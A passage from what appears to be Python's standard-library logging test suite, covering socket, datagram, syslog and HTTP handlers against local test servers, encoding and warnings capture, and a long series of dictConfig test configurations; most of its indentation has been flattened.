logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
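        # DatagramHandler uses the same pickled format as SocketHandler, so each
        # packet starts with a 4-byte length prefix that is simply skipped here.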
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
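        # '<11>' is the syslog PRI field: facility LOG_USER (1) * 8 + severity
        # ERROR (3) = 11; append_nul adds the trailing NUL byte by default.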
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
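        # HTTPHandler sends the record's attribute dict url-encoded: in the
        # query string for GET requests and in the request body for POST.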
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
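# Illustrative sketch (not part of the test suite): captureWarnings(True)
# reroutes warnings.warn() output to the 'py.warnings' logger; the first
# warning routed to that logger while it has no handlers attaches a
# NullHandler, which is what the test above checks.  The stream and message
# are invented for the example.
def _example_capture_warnings():
    import io
    import logging
    import warnings
    logging.captureWarnings(True)
    try:
        stream = io.StringIO()
        handler = logging.StreamHandler(stream)
        logger = logging.getLogger("py.warnings")
        logger.addHandler(handler)
        try:
            with warnings.catch_warnings():
                warnings.simplefilter("always")
                warnings.warn("captured into the logging system")
        finally:
            logger.removeHandler(handler)
            handler.close()
        return stream.getvalue()
    finally:
        logging.captureWarnings(False)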
def formatFunc(format, datefmt=None):
    # Formatter factory referenced by config4a through the '()' callable key.
    return logging.Formatter(format, datefmt)
def handlerFunc():
    # Handler factory referenced by config4a through the '()' callable key.
    return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
    # Custom handler class referenced by name in config5 and config6.
    pass
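# Illustrative sketch (not part of the test suite): the smallest useful
# dictConfig() payload mirrors the config0 dictionary defined in
# ConfigDictTest below -- one formatter, one StreamHandler resolved through
# the ext:// protocol, and a root logger that uses it.  The names and format
# string are invented for the example; 'disable_existing_loggers' defaults to
# True, which config8/config8a below toggle explicitly.
def _example_minimal_dict_config():
    import logging.config
    logging.config.dictConfig({
        'version': 1,
        'formatters': {
            'plain': {'format': '%(levelname)s ++ %(message)s'},
        },
        'handlers': {
            'console': {
                'class': 'logging.StreamHandler',
                'formatter': 'plain',
                'stream': 'ext://sys.stdout',
            },
        },
        'root': {'level': 'WARNING', 'handlers': ['console']},
    })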
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
    def test_config2_failure(self):
        # A config with a bad stream reference should be rejected.
        self.assertRaises(Exception, self.apply_config, self.config2)
    def test_config2a_failure(self):
        # A config with a misspelt handler level should be rejected.
        self.assertRaises(Exception, self.apply_config, self.config2a)
    def test_config2b_failure(self):
        # A config with a misspelt logger level should be rejected.
        self.assertRaises(Exception, self.apply_config, self.config2b)
    def test_config3_failure(self):
        # A config referencing an undefined formatter should be rejected.
        self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
    # Same as test_config7_ok, but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
